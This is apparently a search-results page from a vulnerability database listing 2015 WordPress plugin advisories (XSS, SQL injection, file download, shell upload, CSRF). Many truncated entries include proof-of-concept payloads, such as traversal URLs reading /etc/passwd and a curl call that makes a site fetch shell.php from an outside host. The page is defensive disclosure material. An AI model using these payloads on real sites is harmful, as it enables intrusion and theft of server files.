Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2015/10/10 12:0 a.m.19 views

Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion

Authenticated file upload in file ajax-load-more/admin/admin.php file, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file. The following code proves that this second variable is also set from...

Exploits0References2
wpexploit
wpexploit
added 2015/09/20 12:0 a.m.8 views

wordpress vertical image slider plugin < 1.2 - Cross-Site Scripting & CSRF

The lack of CSRF check and sanitisation could allow attackers to perform Cross-Site Scripting attack against logged in administrator, as well as upload arbitrary files XSS via CSRF: alert"XSS"' alert"XSS"' setTimeout'form1.submit', 1; Upload file via CSRF:...

0.7AI score
Exploits0References2
wpexploit
wpexploit
added 2015/09/15 12:0 a.m.19 views

MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)

Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log include: Failed opening '/proc/self/environ' for inclusion...

5CVSS1.3AI score0.09325EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/09/15 12:0 a.m.34 views

WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)

The following payload placed in a page or post does not work in comments: TEST!!!caption width="1" caption='Click me...

4.3CVSS0.5AI score0.06389EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/09/14 12:0 a.m.16 views

EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File Download

The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system though the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the WordPress administrator. The file name to download is not sanitized and path travers...

0.3AI score
Exploits0References1
wpexploit
wpexploit
added 2015/09/14 12:0 a.m.28 views

EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution

There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql"...

2.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/09/14 12:0 a.m.22 views

PowerPress Podcasting < 6.0.5 - Authenticated Cross-Site Scripting (XSS)

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. 1. Logon into any...

3.5CVSS0.3AI score0.01183EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/09/14 12:0 a.m.20 views

Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...

5CVSS0.5AI score0.02043EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/09/12 12:0 a.m.14 views

Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)

The vulnerability exists due to insufficient sanitation of user-supplied data in "rstype" HTTP GET parameter when creating / editing a slider. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of...

4.3CVSS1.6AI score0.01156EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/09/06 12:0 a.m.19 views

WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...

4.3CVSS1.1AI score0.03605EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/08/31 12:0 a.m.31 views

Thumbnail Carousel Slider < 1.0.1 - Authenticated Shell Upload & CSRF

The original advisory states that this vulnerability is exploitable with editor and author roles but this is incorrect. Only the administrator role by default can trigger this vulnerability. However, CSRF on the image upload form makes this exploitable by a malicious actor. Create a file named...

0.4AI score
Exploits0References1
wpexploit
wpexploit
added 2015/08/21 12:0 a.m.13 views

SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability in its settings page, via the search GET parameter https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...

1.4AI score
Exploits0References2
wpexploit
wpexploit
added 2015/08/20 12:0 a.m.12 views

WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)

The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators. ' / ' /...

2.1AI score
Exploits0References2
wpexploit
wpexploit
added 2015/08/15 12:0 a.m.23 views

Google Adsense & Hotel Booking <= 1.0.5 - Open Proxy

Plugin is still affected and has been closed. The code in ./plugin/google-adsense-and-hotel-booking/proxy.php allows an arbitrary user to proxy POST requests though the host site. This may allow attackers to hide attacks, or DoS a site if the POST request is pointed back at itself causing a loop...

6.4CVSS1.8AI score0.02232EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/08/14 12:0 a.m.14 views

WP-Polls <= 2.70 - Stored Cross-Site Scripting (XSS)

The /wp-admin/admin.php?page=wp-polls%2Fpolls-add.php page is vulnerable to XSS within the pollqquestion and pollaanswers parameters. Add a new poll with the question or answer as...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/08/13 12:0 a.m.16 views

Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)

An attacker can make a fake attack attempt which will be logged, and can inject JavaScript. curl --referer 'you are using bad filtering for input ript alert"XSS here" ript; :; ;' http://example.com...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2015/08/09 12:0 a.m.26 views

WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

Wordpress plugin wp-symposium version 15.5.1 and probably all existing previous versions suffers from an unauthenticated SQL Injection in getalbumitem.php, parameter 'size'. The issue is exploitable even if the plugin is deactivated. PoC URL :...

7.5CVSS1.3AI score0.74127EPSS
Exploits5References2
wpexploit
wpexploit
added 2015/08/06 12:0 a.m.19 views

MP3-jPlayer <= 2.4.2 - Full Path Disclosure

The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. 120 $info = " 121 Get: " . $mp3 . " 122 Sent: " . $sent . " 123 File: " . $file . " 124 Open: " . $SERVER'DOCUMENTROOT' . $fp . " 125 Root: " . $rooturl . " 126 pID: "...

5CVSS1.4AI score0.02093EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/08/04 12:0 a.m.18 views

Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)

The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé", add the payload '" to the email field. The JavaScript will be executed on the...

4.3CVSS0.6AI score0.0489EPSS
Exploits6References2
wpexploit
wpexploit
added 2015/08/04 12:0 a.m.11 views

Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)

The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting XSS security vulnerability...

0.9AI score
Exploits0References1
wpexploit
wpexploit
added 2015/08/04 12:0 a.m.22 views

Ninja Forms <= 2.9.21 - Authenticated Reflected Cross-Site Scripting (XSS)

The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin.php?page=nf-processing&title=alert123;...

0.7AI score
Exploits0References2
wpexploit
wpexploit
added 2015/08/04 12:0 a.m.21 views

Altos Connect Widget <= 1.3.0 - Unauthenticated Cross-Site Scripting (XSS)

The altos-connect WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/altos-connect/jquery-validate/demo/demo/captcha/index.php/"alert1...

4.3CVSS1AI score0.01103EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/08/02 12:0 a.m.13 views

recent-backups <= 0.7 - Remote File Download

Plugin is still affected and has been closed. The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...

5CVSS1.4AI score0.03854EPSS
Exploits1References3
wpexploit
wpexploit
added 2015/08/02 12:0 a.m.23 views

simple-image-manipulator <= 1.0 - Remote File Download

Plugin is still affected and has been closed. In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or sanitize input when determining file location. $ curl...

5CVSS1.6AI score0.07038EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/27 12:0 a.m.13 views

Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)

An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...

0.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/07/25 12:0 a.m.9 views

Music Store <= 1.0.14 - Referer Header Open Redirect

The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...

0.4AI score
Exploits0References3
wpexploit
wpexploit
added 2015/07/23 12:0 a.m.41 views

WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)

Description Authenticated Cross-Site Scripting XSS in post/page text editor mode. Editor user and up. link...

4CVSS6AI score0.08814EPSS
Exploits1References3
wpexploit
wpexploit
added 2015/07/18 12:0 a.m.24 views

wptf-image-gallery 1.0.3 - Remote File Download

Plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajaxload.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 $ curl...

5CVSS1.2AI score0.02277EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/16 12:0 a.m.12 views

Download Manager <= 2.7.94 - Authenticated Stored XSS

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: .jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser...

6.4AI score
Exploits0References2
wpexploit
wpexploit
added 2015/07/12 12:0 a.m.16 views

Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download

Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files. $ curl...

5CVSS2.5AI score0.08833EPSS
Exploits1References3
wpexploit
wpexploit
added 2015/07/10 12:0 a.m.17 views

Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload

The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...

5CVSS0.7AI score0.02996EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/10 12:0 a.m.30 views

IBS Mappro <= 0.6 - Directory Traversal

The ibs-mappro WordPress plugin was affected by a Directory Traversal security vulnerability. http://www.example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd...

7.8CVSS2.8AI score0.03263EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/07 12:0 a.m.15 views

Floating Social Bar <= 1.1.5 - Cross-Site Scripting (XSS)

The Floating Social Bar WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=fsbsaveorder&items1="alert"XSS";...

4.3CVSS0.5AI score0.02067EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/07 12:0 a.m.40 views

NewStatPress <= 1.0.4 - SQL Injection

The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitation. In particular, at line 98 of 'includes/nspsearch.php'. Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...

7.5CVSS0.2AI score0.01815EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/07/07 12:0 a.m.37 views

NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)

The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nspsearch.php’ several variables from the $GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger ...

4.3CVSS0.5AI score0.01879EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/07/05 12:0 a.m.14 views

Image Export <= 1.1.0 - Directory Traversal

The image-export WordPress plugin was affected by a Directory Traversal security vulnerability. $ curl http://www.example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd...

2.2AI score
Exploits0References2
wpexploit
wpexploit
added 2015/07/05 12:0 a.m.33 views

WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion

The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with pat...

5CVSS0.7AI score0.24093EPSS
Exploits2References5
wpexploit
wpexploit
added 2015/07/05 12:0 a.m.20 views

StageShow <= 5.0.8 - Open Redirect

The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...

6.4CVSS1.8AI score0.06283EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/07/03 12:0 a.m.16 views

Swim Team <= v1.44.10777 - Local File Inclusion

The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files. $ curl...

5CVSS0.9AI score0.32714EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/07/02 12:0 a.m.17 views

MDC YouTube Downloader <= 2.1.0 - Local File Inclusion

The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...

5CVSS7.5AI score0.10148EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/06/30 12:0 a.m.13 views

WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)

The WP-CopyProtect Protect your blog posts plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery CSRF token nonce. alert1'/ document.getElementById"form".submit;...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2015/06/26 12:0 a.m.14 views

Multiple Themes - Privilige Escalation

The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking. An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on th...

6.5CVSS1.1AI score0.01488EPSS
Exploits3References2
wpexploit
wpexploit
added 2015/06/25 12:0 a.m.16 views

WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)

The WP Mobile Detector plugin exposes the AJAX action ‘websitezoptions’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent XSS attack on Mobile visitors. import requests s = requests.session...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/06/23 12:0 a.m.14 views

wp-instance-rename <= 1.0 - Arbitrary File Download

The wp-instance-rename WordPress plugin was affected by an Arbitrary File Download security vulnerability. url --data "dbname=wp&dumpfname=/etc/passwd&backupfolder=." http://www.example.com/wp-instance-rename/mysqldumpdownload.php -o p.zip...

5CVSS1.6AI score0.02851EPSS
Exploits3References2
wpexploit
wpexploit
added 2015/06/18 12:0 a.m.34 views

Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)

The Erident Custom Login and Dashboard plugin exposes a call to the updateoption method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to...

6.8CVSS0.1AI score0.00674EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/06/18 12:0 a.m.19 views

Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)

The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this...

Exploits0References1
wpexploit
wpexploit
added 2015/06/15 12:0 a.m.12 views

Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)

The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...

3.6AI score
Exploits0References2
wpexploit
wpexploit
added 2015/06/12 12:0 a.m.29 views

Yoast SEO <= 2.1.1 - Authenticated Stored DOM XSS

The "snippet preview" functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2. Vulnerable URL: /wp-admin/post-new.php?posttitle= Vulnerable Code wordpress-seo/js/wp-seo-metabox.js: function ystcleanstr if str == '' || str == undefined return...

4.3CVSS0.5AI score0.03206EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/06/12 12:0 a.m.14 views

Zip Attachments <= 1.1.4 - Arbitrary File Download

The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. http://www.example.com/wp-content/plugins/zip-attachments/download.php?zafile=../../../../../etc/passwd&zafilename=passwd...

5CVSS1.9AI score0.15646EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/06/10 12:0 a.m.24 views

Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

The Smart Website Tools by AddThis plugin exposes an AJAX function called 'atasyncloading' in 'addthis/addthis-for-wordpress.php'. Access to this function is restricted to Registered users, however is not restricted to Administrative users, meaning that anyone with an account on the target site c...

0.1AI score
Exploits0References2
Total number of security vulnerabilities4359